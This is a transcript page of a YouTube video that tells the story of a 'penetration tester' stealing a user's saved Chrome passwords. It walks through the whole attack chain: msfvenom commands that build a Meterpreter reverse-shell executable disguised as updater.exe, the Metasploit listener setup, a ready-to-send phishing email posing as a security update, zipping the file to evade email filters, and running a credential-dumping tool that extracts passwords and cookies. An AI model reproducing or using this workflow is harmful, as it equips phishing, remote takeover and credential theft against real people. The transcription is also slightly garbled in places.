YouTube2Text

How Hackers Hack Chrome Passwords — Transcript

by Neurix · 2,213 words · 445 segments · language en · Watch on YouTube

Full transcript

  1. 0:03This is Sally. She's an artist who
  2. 0:05spends her days bringing beautiful
  3. 0:06landscapes to life on painting.
  4. 0:09But like most of us, she also lives a
  5. 0:11digital life.
  6. 0:12She checks emails, shops online, pays
  7. 0:15bills, and chats with friends, all
  8. 0:17through her trusted Windows laptop.
  9. 0:19Take today, for example.
  10. 0:21Sally wants to check her email.
  11. 0:23She opens her browser and navigates to
  12. 0:25ProtonMail, a service she chose
  13. 0:28specifically because she cares about
  14. 0:30privacy and security.
  15. 0:32She types her email,
  16. 0:33[email protected],
  17. 0:37then her password,
  18. 0:38mycat2027!@#.
  19. 0:43A strong password, uppercase, lowercase,
  20. 0:46numbers, special characters, all the
  21. 0:48good stuff.
  22. 0:50Sally smiles thinking, "No hacker will
  23. 0:52ever find this one."
  24. 0:54She clicks sign in,
  25. 0:56and boom, she's in.
  26. 0:58But then Chrome does what Chrome always
  27. 1:00does.
  28. 1:01A little prompt appears at the top of
  29. 1:03the screen.
  30. 1:04It asks to save the password and
  31. 1:05username for this website.
  32. 1:08Sally barely glances at it.
  33. 1:10She clicks save without a second
  34. 1:12thought.
  35. 1:14This is a cool Chrome feature.
  36. 1:16The next time she wants to log in, she
  37. 1:18won't have to type the password again.
  38. 1:20Then Sally visits her favorite online
  39. 1:22store, demoblaze.com.
  40. 1:25She clicks log in and enters her
  41. 1:27credentials.
  42. 1:29Her username is sally7780.
  43. 1:32And her password is coffee@42#.
  44. 1:35She clicks log in.
  45. 1:37Chrome asks again, "Save password for
  46. 1:39demoblaze.com?"
  47. 1:41She clicks save.
  48. 1:43It's convenient, right?
  49. 1:45The browser remembers for her.
  50. 1:48No more typing that long password every
  51. 1:49time.
  52. 1:51It's secure, she thinks.
  53. 1:53But here's the uncomfortable truth that
  54. 1:55Sally, and most people, don't realize.
  55. 1:58When you click save password in Chrome,
  56. 2:01Edge, or Firefox, you're not storing
  57. 2:03that password in some impenetrable
  58. 2:05vault.
  59. 2:07You're storing it in a file on your
  60. 2:08computer.
  61. 2:09It's encrypted, yes,
  62. 2:11>> [music]
  63. 2:11>> but the key to decrypt it is sitting
  64. 2:12right there on your machine tied to your
  65. 2:15Windows login.
  66. 2:16And if an attacker gains even remote
  67. 2:18access to your machine, that file
  68. 2:20becomes a treasure chest waiting to be
  69. 2:22opened.
  70. 2:22>> [music]
  71. 2:23>> Every password, every cookie, every
  72. 2:25saved credit card number will be
  73. 2:27exposed.
  74. 2:29And this is where Kim comes in.
  75. 2:31He is a penetration tester and ethical
  76. 2:34hacker.
  77. 2:35His role is to break into systems with
  78. 2:37permission, so he can show people like
  79. 2:39Sally where their security fails before
  80. 2:41the real criminals find it.
  81. 2:43Today, Kim isn't interested in Sally's
  82. 2:45art.
  83. 2:46He's interested in something far more
  84. 2:48valuable, her digital identity.
  85. 2:50Every password Sally has ever saved in
  86. 2:52her browser is like a key to her entire
  87. 2:54online life.
  88. 2:56Her email, her shopping accounts, maybe
  89. 2:58even her banking.
  90. 2:59And today, Kim is going to ethically
  91. 3:01steal every single one of them.
  92. 3:04Now, let's dive in and see how Kim
  93. 3:06steals Sally's password saved in Chrome.
  94. 3:09First, Kim needs a way in.
  95. 3:11He's going to create what's called a
  96. 3:12reverse shell payload.
  97. 3:15This is a small program that, when run
  98. 3:16on Sally's computer, reaches back out to
  99. 3:18Kim's machine and gives him remote
  100. 3:20access.
  101. 3:22To do so, Kim opens a terminal on his
  102. 3:24Kali Linux machine and types
  103. 3:26msfvenom -p
  104. 3:28windows/x64/meterpreter/reverse_tcp.
  105. 3:36This generates a 64-bit meterpreter
  106. 3:38reverse TCP payload, which can be used
  107. 3:40to establish a remote connection to a
  108. 3:42target system.
  109. 3:44Next, he needs to specify LHOST.
  110. 3:48This is the IP address of a machine he
  111. 3:49controls.
  112. 3:51This is where Sally's computer will
  113. 3:52connect back to.
  114. 3:54Kim opens a new terminal and types IPA
  115. 3:57to find his IP address.
  116. 3:59He sees 192.168.122.71
  117. 4:05and uses that as his LHOST value.
  118. 4:08Then comes LPORT.
  119. 4:10This is the port Kim's machine will
  120. 4:12listen on for the incoming connection.
  121. 4:14He chooses 4444,
  122. 4:16a common port for this type of attack.
  123. 4:19Finally, he adds -fx
  124. 4:22to specify the output format as a
  125. 4:24Windows executable.
  126. 4:26And -o updater.exe to name the file.
  127. 4:30And that's it.
  128. 4:31The full command is ready.
  129. 4:33When Kim presses enter, this will create
  130. 4:35updater.exe,
  131. 4:37a file that looks innocent, but will
  132. 4:39give Kim full remote access the moment
  133. 4:41Sally runs it.
  134. 4:43Kim presses enter.
  135. 4:45And just like that, he now has his
  136. 4:47weapon.
  137. 4:48Now he just needs Sally to run it.
  138. 4:51He'll email it to her.
  139. 4:53When Sally clicks it, it will open a
  140. 4:54tunnel back to Kim.
  141. 4:56But how does Kim hear it?
  142. 4:58He needs to be listening for that
  143. 4:59connection, waiting for Sally to click.
  144. 5:02To do so, he uses the Metasploit
  145. 5:04Framework console.
  146. 5:06He fires it up and the Metasploit
  147. 5:07console loads up.
  148. 5:09Now Kim needs to configure the listener.
  149. 5:11Think of it like setting up a
  150. 5:12walkie-talkie on the right channel.
  151. 5:15He types use exploit/multi/handler.
  152. 5:18This command tells Metasploit to
  153. 5:19activate a module designed to catch
  154. 5:21incoming connections.
  155. 5:24Essentially, it turns his machine into a
  156. 5:26receiver.
  157. 5:27Next, he types set payload
  158. 5:29windows/x64/meterpreter/reverse_tcp.
  159. 5:35This tells the receiver exactly what
  160. 5:37kind of signal to expect.
  161. 5:39It has to match the payload he built
  162. 5:41into updater.exe, like making sure two
  163. 5:43walkie-talkies are on the same
  164. 5:45frequency.
  165. 5:47Then he sets his IP address with set
  166. 5:49LHOST 192.168.122.71.
  167. 5:56This tells the listener which network
  168. 5:57door to watch.
  169. 5:59He sets the port with set LPORT 4444.
  170. 6:03Think of this as the specific channel on
  171. 6:05the walkie-talkie.
  172. 6:06Finally, he types exploit.
  173. 6:09This activates the listener.
  174. 6:11The terminal responds, started reverse
  175. 6:13TCP handler on 192.168.1.105:4444.
  176. 6:21Kim sits back waiting.
  177. 6:23The trap is set.
  178. 6:24Now he just needs Sally to take the
  179. 6:26bait.
  180. 6:28Now he can craft an email to Sally which
  181. 6:29contains the payload.
  182. 6:31The email reads, "Dear user, [music] we
  183. 6:34have detected that your system is out of
  184. 6:35date and requires an immediate security
  185. 6:37update.
  186. 6:39To complete this update, please download
  187. 6:41the attached file and run the update
  188. 6:42installer on your device.
  189. 6:44The update will only take a few minutes
  190. 6:46to install.
  191. 6:47This update is essential for the
  192. 6:49continued performance and security of
  193. 6:50your system.
  194. 6:52Best regards,
  195. 6:53support team."
  196. 6:56Now comes the final and most important
  197. 6:57piece.
  198. 6:59Kim needs to attach the updater.x file
  199. 7:01to the email.
  200. 7:03But there's a problem. Most email
  201. 7:05providers block .x files outright.
  202. 7:08They know executables are dangerous.
  203. 7:11So Kim will zip it before sending.
  204. 7:13Zipping does two things. It compresses
  205. 7:15the file, but more importantly, it wraps
  206. 7:17the .x inside a container that looks
  207. 7:19less suspicious to email filters.
  208. 7:21To zip the file, Kim goes back to his
  209. 7:23terminal and types zip updater.zip
  210. 7:26updater.x.
  211. 7:29This command takes his updater.x file
  212. 7:31and packages it into a new file called
  213. 7:33updater.zip.
  214. 7:35Kim presses enter.
  215. 7:37The zip file is created.
  216. 7:39His fishing email is ready to go.
  217. 7:42Now he can go back to ProtonMail and
  218. 7:44attach the zip file.
  219. 7:45He clicks the attachments icon
  220. 7:48and select the updater.zip file.
  221. 7:50And voila.
  222. 7:52The phishing mail is now complete.
  223. 7:55He clicks send.
  224. 7:57After a few seconds,
  225. 7:59the email is on its way to Sally.
  226. 8:01Now all it takes is one click from Sally
  227. 8:04and he's in.
  228. 8:06Meanwhile, Sally checks her email.
  229. 8:08There's a message from what looks like
  230. 8:09the Windows support team.
  231. 8:11The subject line warns of a critical
  232. 8:13update.
  233. 8:14The email says she must run the
  234. 8:15attachment immediately to protect her
  235. 8:17computer.
  236. 8:18She doesn't think twice.
  237. 8:20She downloads the file,
  238. 8:23opens it,
  239. 8:25then extracts the zip.
  240. 8:28And there it is, the updater.exe Trojan
  241. 8:31Kim center.
  242. 8:33It disguises itself as something
  243. 8:34legitimate while hiding its true
  244. 8:35purpose.
  245. 8:37Sally double clicks it thinking it's a
  246. 8:39genuine security update from Microsoft.
  247. 8:42Nothing seems to happen.
  248. 8:44But in reality, something huge just
  249. 8:47happened behind the scenes.
  250. 8:49On Kim's screen, the terminal explodes
  251. 8:52with activity.
  252. 8:53Sally's computer has reached out across
  253. 8:55the internet connecting back to Kim's
  254. 8:57machine.
  255. 8:59The tunnel is now open.
  256. 9:01Sally's computer is no longer just hers,
  257. 9:03it's theirs.
  258. 9:05Kim's screen outputs
  259. 9:07meterpreter session one opened.
  260. 9:10Boom.
  261. 9:11Kim is in.
  262. 9:12He now has a meterpreter shell on
  263. 9:14Sally's Windows machine.
  264. 9:16This isn't just a command prompt. This
  265. 9:18is one of the most powerful
  266. 9:20post-exploitation tools in existence.
  267. 9:23Now that Kim has access, he needs to get
  268. 9:25his bearings.
  269. 9:26First, he checks what user he's running
  270. 9:28as.
  271. 9:30To do so, he types get UID.
  272. 9:34The output is server username desktop
  273. 9:37backslash Sally.
  274. 9:39The tells Kim he's running as Sally
  275. 9:41herself, meaning he has all the access
  276. 9:43Sally has.
  277. 9:45Next, he checks what system he's on
  278. 9:47using the sysinfo command.
  279. 9:49He can see that Sally's machine is
  280. 9:51running Windows 10 with a 64-bit
  281. 9:53architecture.
  282. 9:54Now, here's where things get
  283. 9:55interesting.
  284. 9:57Since Kim is already logged in as Sally
  285. 9:59through the meterpreter session he
  286. 10:01established, he could manually locate
  287. 10:03the file containing Sally's encrypted
  288. 10:05Chrome passwords, find the decryption
  289. 10:07key, which as explained earlier is tied
  290. 10:10to her Windows user account, and write
  291. 10:12custom scripts to decrypt the passwords.
  292. 10:16But such a process is also tedious,
  293. 10:18time-consuming, and error-prone.
  294. 10:20In fact, why bother reinventing the
  295. 10:22wheel when there's a tool built
  296. 10:23specifically for this?
  297. 10:25This tool is called Chrome Elevator.
  298. 10:28Chrome Elevator is a modern open-source
  299. 10:30tool designed for one purpose,
  300. 10:32extracting stored passwords from a
  301. 10:34compromised machine.
  302. 10:36It pulls passwords, cookies, credit
  303. 10:38cards, and session tokens automatically.
  304. 10:41First, Kim needs to get Chrome Elevator
  305. 10:43onto Sally's machine.
  306. 10:44To do [music] so, he first downloads it.
  307. 10:47He goes back to his browser and searches
  308. 10:49for Chrome Elevator.
  309. 10:50The first result is the official GitHub
  310. 10:52page. He clicks it.
  311. 10:54A GitHub page for the Chrome Elevator
  312. 10:56project opens.
  313. 10:58On that page, he looks for the releases
  314. 11:00section
  315. 11:01and opens the release page.
  316. 11:03There, he scrolls down and finds the
  317. 11:05chrome-dash-injector.zip
  318. 11:07file.
  319. 11:08This is the file containing the tool
  320. 11:10that will decrypt Sally's passwords.
  321. 11:13He downloads it.
  322. 11:14Then he navigates to his downloads
  323. 11:16folder to verify the download.
  324. 11:18As you can see in his downloads folder,
  325. 11:20there's a new file, chrome-injector.zip.
  326. 11:23He unzips it using the unzip command.
  327. 11:26And there it is.
  328. 11:28He gets two new files,
  329. 11:30chrome-elevator-x64.x
  330. 11:32for 64-bit systems and Chrome Elevator
  331. 11:35arm64.x for arm64-based devices.
  332. 11:40Chrome Elevator x64.x is the one Kim
  333. 11:43needs since he confirmed earlier with
  334. 11:45the sysinfo command that Sally's machine
  335. 11:47is running 64-bit architecture.
  336. 11:50Now that he has the file, he can upload
  337. 11:52it directly to Sally's machine through
  338. 11:53meterpreter.
  339. 11:55To do so, he types the command upload
  340. 11:57followed by the path to the Chrome
  341. 11:59Elevator x64.x file.
  342. 12:02Then specifies the destination path on
  343. 12:04Sally's machine where he wants to upload
  344. 12:06the file, which is the temp directory, a
  345. 12:08common hiding spot that doesn't raise
  346. 12:10alarms.
  347. 12:11He hits enter.
  348. 12:13And voila, the upload is complete.
  349. 12:16Now that Chrome Elevator x64.exe
  350. 12:19is on Sally's machine, Kim needs to
  351. 12:21execute it there.
  352. 12:23To do so, he needs a standard Windows
  353. 12:25command shell on Sally's computer.
  354. 12:28That's exactly what the shell command
  355. 12:29provides.
  356. 12:31He types shell and presses enter.
  357. 12:34Instantly, he's dropped into Sally's
  358. 12:36command prompt.
  359. 12:37Once in the shell, he can use standard
  360. 12:39Windows command.
  361. 12:40For example, he can use the change
  362. 12:42directory command to navigate to Sally's
  363. 12:44temp folder.
  364. 12:45Remember, this is where he uploaded the
  365. 12:47Chrome Elevator.x file.
  366. 12:50Now that Kim is in Sally's temp folder,
  367. 12:52he can use the dir command to list the
  368. 12:54contents and verify that the Chrome
  369. 12:56Elevator executable actually landed
  370. 12:58there. And voila,
  371. 13:00the file is there.
  372. 13:02The upload succeeded.
  373. 13:04The tool is ready.
  374. 13:06Now all Kim needs is to execute it.
  375. 13:09To execute Chrome Elevator, Kim types
  376. 13:11Chrome Elevator x64.x
  377. 13:13chrome-o sallydata.
  378. 13:16Let's break down what this command does.
  379. 13:18Chrome Elevator x64.x is the exact name
  380. 13:21of the Chrome Elevator executable Kim
  381. 13:23uploaded to Sally's machine.
  382. 13:25Chrome tells Chrome Elevator to target
  383. 13:27Chrome specifically rather than Firefox
  384. 13:29or brave for example.
  385. 13:31Dash o Sally data specifies the output
  386. 13:33directory where results will be saved.
  387. 13:36Sally data is the folder name.
  388. 13:38This is where the extracted data will
  389. 13:40land.
  390. 13:42Kim presses enter.
  391. 13:44For a few seconds the tool does its
  392. 13:45magic.
  393. 13:47Injecting into Chrome's process,
  394. 13:49bypassing encryption, and pulling out
  395. 13:51everything Sally has ever saved.
  396. 13:53Then boom.
  397. 13:55The results appear. 18 cookies and two
  398. 13:57passwords found.
  399. 13:58>> [music]
  400. 13:59>> Sally's digital life now neatly packaged
  401. 14:01and waiting for Kim to explore.
  402. 14:04Looking closer we can see that Chrome
  403. 14:05lovator automatically saved the results
  404. 14:07in a new folder called Chrome located
  405. 14:10inside Sally data folder.
  406. 14:12Before Kim navigates to Sally's data, he
  407. 14:14first types exit to leave the window
  408. 14:16shell and return to meter preeder.
  409. 14:18This is because the window shell is
  410. 14:20limited.
  411. 14:21Meter preeder offers a much richer set
  412. 14:23of file commands.
  413. 14:25For example, the PWD command which
  414. 14:27reveals the current working directory in
  415. 14:29a much cleaner and more consistent way
  416. 14:31than the window shell.
  417. 14:33As Kim navigates to Sally's data, he
  418. 14:36spots the Chrome folder created by
  419. 14:38Chrome lovator.
  420. 14:39He enters it.
  421. 14:40Inside he finds a folder named default.
  422. 14:44This is the default Chrome profile on
  423. 14:45Sally's machine.
  424. 14:47Kim digs deeper.
  425. 14:48A quick LS command reveals what he's
  426. 14:50after. Two files, cookies.json and
  427. 14:53passwords.json.
  428. 14:56Everything Sally trusted Chrome to keep
  429. 14:57safe is now sitting in these two files.
  430. 15:01And Kim has full access.
  431. 15:03He runs the cat command to open the
  432. 15:05passwords.json file.
  433. 15:07And there it is. Sally's credentials
  434. 15:09exposed.
  435. 15:11Kim can see the URLs of the websites for
  436. 15:13which Chrome saved passwords along with
  437. 15:15the matching usernames and the passwords
  438. 15:18themselves in plain text.
  439. 15:20The very password Sally thought was safe
  440. 15:22are now right on Kim's screen, ready to
  441. 15:25be exploited.
  442. 15:27And that's it for today.
  443. 15:28If you enjoyed this video, give it a
  444. 15:30thumbs up, subscribe for more, and don't
  445. 15:32save passwords in browsers. Bye-bye.

About this transcript

This page contains the full transcript of How Hackers Hack Chrome Passwords by Neurix, generated from the public captions YouTube serves with the video. The transcript has 2,213 words across 445 segments, with the original timestamps preserved so you can click any line to jump to that moment in the embedded player.

What you can do with it

Use the transcript to take notes, quote the speaker, build a study guide, generate a summary with ChatGPT or Claude via the YouTube Summary tool, or export it as a timed subtitle file with YouTube to SRT. You can also re-open it in the transcriber to translate the transcript into 100+ languages.

Free YouTube transcript tool

YouTube2Text is a free YouTube transcript generator — no signup, no daily limit. Paste any YouTube link and get the full transcript instantly, with timestamps, click-to-jump, translation to 100+ languages, AI prompts for ChatGPT, Claude, and Gemini, and exports to TXT, SRT, VTT, or Markdown.